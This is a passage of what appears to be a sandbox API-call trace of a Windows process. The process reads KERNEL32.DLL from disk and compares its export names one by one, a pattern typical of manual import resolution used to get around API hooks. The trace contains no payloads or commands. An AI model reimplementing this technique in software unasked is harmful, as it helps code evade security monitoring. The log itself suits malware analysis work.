hHeap=0x5b0000) returned 1 [0087.997] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5fd8e0 | out: hHeap=0x5b0000) returned 1 [0088.001] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c0710 | out: hHeap=0x5b0000) returned 1 [0088.002] GetModuleHandleA (lpModuleName="NTDLL.dll") returned 0x7ffc5f810000 [0088.003] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnprintf") returned 0x7ffc5f8a6970 [0088.003] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="_vsnwprintf") returned 0x7ffc5f8a6a40 [0088.003] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memset") returned 0x7ffc5f8bb580 [0088.003] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memcpy") returned 0x7ffc5f8bb240 [0088.003] GetProcAddress (hModule=0x7ffc5f810000, lpProcName="memmove") returned 0x7ffc5f8bb240 [0088.005] GetProcessHeap () returned 0x5b0000 [0088.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x68) returned 0x5b88b0 [0088.005] GetProcessHeap () returned 0x5b0000 [0088.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5c90a0 [0088.006] GetProcessHeap () returned 0x5b0000 [0088.006] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x48) returned 0x5c0620 [0088.006] GetModuleHandleA (lpModuleName="Kernel32.dll") returned 0x7ffc5ecd0000 [0088.006] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetProcAddress") returned 0x7ffc5ecf0b80 [0088.006] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryW") returned 0x7ffc5ecf50f0 [0088.006] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LoadLibraryA") returned 0x7ffc5ecf74d0 [0088.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="FreeLibrary") returned 0x7ffc5ecf4810 [0088.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleW") returned 0x7ffc5ecf3d40 [0088.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleHandleA") returned 0x7ffc5ecf4c90 [0088.007] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x7ffc5ecd0000 [0088.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0088.007] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0088.007] GetModuleFileNameA (in: hModule=0x7ffc5ecd0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll")) returned 0x20 [0088.007] CreateFileA (lpFileName="C:\\Windows\\system32\\KERNEL32.DLL" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x134 [0088.208] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0088.208] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0088.208] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=705584) returned 1 [0088.208] GetProcessHeap () returned 0x5b0000 [0088.208] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xac430) returned 0x5dc590 [0088.210] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0088.210] ReadFile (in: hFile=0x134, lpBuffer=0x5dc590, nNumberOfBytesToRead=0xac430, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x5dc590*, lpNumberOfBytesRead=0x14f5a4*=0xac430, lpOverlapped=0x0) returned 1 [0088.219] CloseHandle (hObject=0x134) returned 1 [0088.220] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0088.225] lstrcmpA (lpString1="ActivateActCtx", lpString2="AcquireSRWLockShared") returned 1 [0088.225] lstrcmpA (lpString1="ActivateActCtx", lpString2="ActivateActCtx") returned 0 [0088.225] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0088.225] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0088.225] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtx") returned 1 [0088.225] lstrcmpA (lpString1="ActivateActCtxWorker", lpString2="ActivateActCtxWorker") returned 0 [0088.226] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockExclusive") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomA", lpString2="AcquireSRWLockShared") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtx") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomA", lpString2="ActivateActCtxWorker") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomA", lpString2="AddAtomA") returned 0 [0088.226] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockExclusive") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomW", lpString2="AcquireSRWLockShared") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtx") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomW", lpString2="ActivateActCtxWorker") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomA") returned 1 [0088.226] lstrcmpA (lpString1="AddAtomW", lpString2="AddAtomW") returned 0 [0088.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockExclusive") returned 1 [0088.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AcquireSRWLockShared") returned 1 [0088.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtx") returned 1 [0088.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="ActivateActCtxWorker") returned 1 [0088.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomA") returned 1 [0088.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddAtomW") returned 1 [0088.226] lstrcmpA (lpString1="AddConsoleAliasA", lpString2="AddConsoleAliasA") returned 0 [0088.226] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockExclusive") returned 1 [0088.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AcquireSRWLockShared") returned 1 [0088.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtx") returned 1 [0088.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="ActivateActCtxWorker") returned 1 [0088.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomA") returned 1 [0088.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddAtomW") returned 1 [0088.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasA") returned 1 [0088.227] lstrcmpA (lpString1="AddConsoleAliasW", lpString2="AddConsoleAliasW") returned 0 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0088.227] lstrcmpA (lpString1="AddIntegrityLabelToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 0 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockExclusive") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AcquireSRWLockShared") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtx") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="ActivateActCtxWorker") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomA") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddAtomW") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasA") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddConsoleAliasW") returned 1 [0088.227] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddDllDirectory") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameA", lpString2="AddLocalAlternateComputerNameA") returned 0 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockExclusive") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AcquireSRWLockShared") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtx") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="ActivateActCtxWorker") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomA") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddAtomW") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasA") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddConsoleAliasW") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddDllDirectory") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.228] lstrcmpA (lpString1="AddLocalAlternateComputerNameW", lpString2="AddLocalAlternateComputerNameW") returned 0 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockExclusive") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AcquireSRWLockShared") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtx") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="ActivateActCtxWorker") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomA") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddAtomW") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasA") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddConsoleAliasW") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddDllDirectory") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.228] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtx", lpString2="AddRefActCtx") returned 0 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockExclusive") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AcquireSRWLockShared") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtx") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="ActivateActCtxWorker") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomA") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddAtomW") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasA") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddConsoleAliasW") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddDllDirectory") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtx") returned 1 [0088.229] lstrcmpA (lpString1="AddRefActCtxWorker", lpString2="AddRefActCtxWorker") returned 0 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockExclusive") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AcquireSRWLockShared") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtx") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="ActivateActCtxWorker") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomA") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddAtomW") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasA") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddConsoleAliasW") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddDllDirectory") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtx") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddRefActCtxWorker") returned 1 [0088.229] lstrcmpA (lpString1="AddResourceAttributeAce", lpString2="AddResourceAttributeAce") returned 0 [0088.229] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockExclusive") returned 1 [0088.229] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AcquireSRWLockShared") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtx") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="ActivateActCtxWorker") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomA") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddAtomW") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasA") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddConsoleAliasW") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddDllDirectory") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtx") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddRefActCtxWorker") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddResourceAttributeAce") returned 1 [0088.230] lstrcmpA (lpString1="AddSIDToBoundaryDescriptor", lpString2="AddSIDToBoundaryDescriptor") returned 0 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockExclusive") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AcquireSRWLockShared") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtx") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="ActivateActCtxWorker") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomA") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddAtomW") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasA") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddConsoleAliasW") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddDllDirectory") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtx") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddRefActCtxWorker") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddResourceAttributeAce") returned 1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0088.230] lstrcmpA (lpString1="AddScopedPolicyIDAce", lpString2="AddScopedPolicyIDAce") returned 0 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockExclusive") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AcquireSRWLockShared") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtx") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="ActivateActCtxWorker") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomA") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddAtomW") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasA") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddConsoleAliasW") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddDllDirectory") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtx") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddRefActCtxWorker") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddResourceAttributeAce") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSIDToBoundaryDescriptor") returned -1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddScopedPolicyIDAce") returned 1 [0088.231] lstrcmpA (lpString1="AddSecureMemoryCacheCallback", lpString2="AddSecureMemoryCacheCallback") returned 0 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockExclusive") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AcquireSRWLockShared") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtx") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="ActivateActCtxWorker") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomA") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddAtomW") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasA") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddConsoleAliasW") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddDllDirectory") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.231] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtx") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddRefActCtxWorker") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddResourceAttributeAce") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddScopedPolicyIDAce") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddSecureMemoryCacheCallback") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredContinueHandler") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AddVectoredExceptionHandler") returned 1 [0088.241] lstrcmpA (lpString1="AdjustCalendarDate", lpString2="AdjustCalendarDate") returned 0 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockExclusive") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AcquireSRWLockShared") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtx") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="ActivateActCtxWorker") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomA") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddAtomW") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasA") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddConsoleAliasW") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddDllDirectory") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtx") returned 1 [0088.241] lstrcmpA (lpString1="AllocConsole", lpString2="AddRefActCtxWorker") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AddResourceAttributeAce") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AddScopedPolicyIDAce") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AddSecureMemoryCacheCallback") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredContinueHandler") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AddVectoredExceptionHandler") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AdjustCalendarDate") returned 1 [0088.242] lstrcmpA (lpString1="AllocConsole", lpString2="AllocConsole") returned 0 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockExclusive") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AcquireSRWLockShared") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtx") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="ActivateActCtxWorker") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomA") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddAtomW") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasA") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddConsoleAliasW") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddDllDirectory") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtx") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddRefActCtxWorker") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddResourceAttributeAce") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSIDToBoundaryDescriptor") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddScopedPolicyIDAce") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddSecureMemoryCacheCallback") returned 1 [0088.242] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredContinueHandler") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AddVectoredExceptionHandler") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AdjustCalendarDate") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocConsole") returned -1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPages", lpString2="AllocateUserPhysicalPages") returned 0 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockExclusive") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AcquireSRWLockShared") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtx") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="ActivateActCtxWorker") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomA") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddAtomW") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasA") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddConsoleAliasW") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddDllDirectory") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddIntegrityLabelToBoundaryDescriptor") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameA") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddLocalAlternateComputerNameW") returned 1 [0088.243] lstrcmpA (lpString1="AllocateUserPhysicalPagesNuma", lpString2="AddRefActCtx") returned 1 [0088.243] 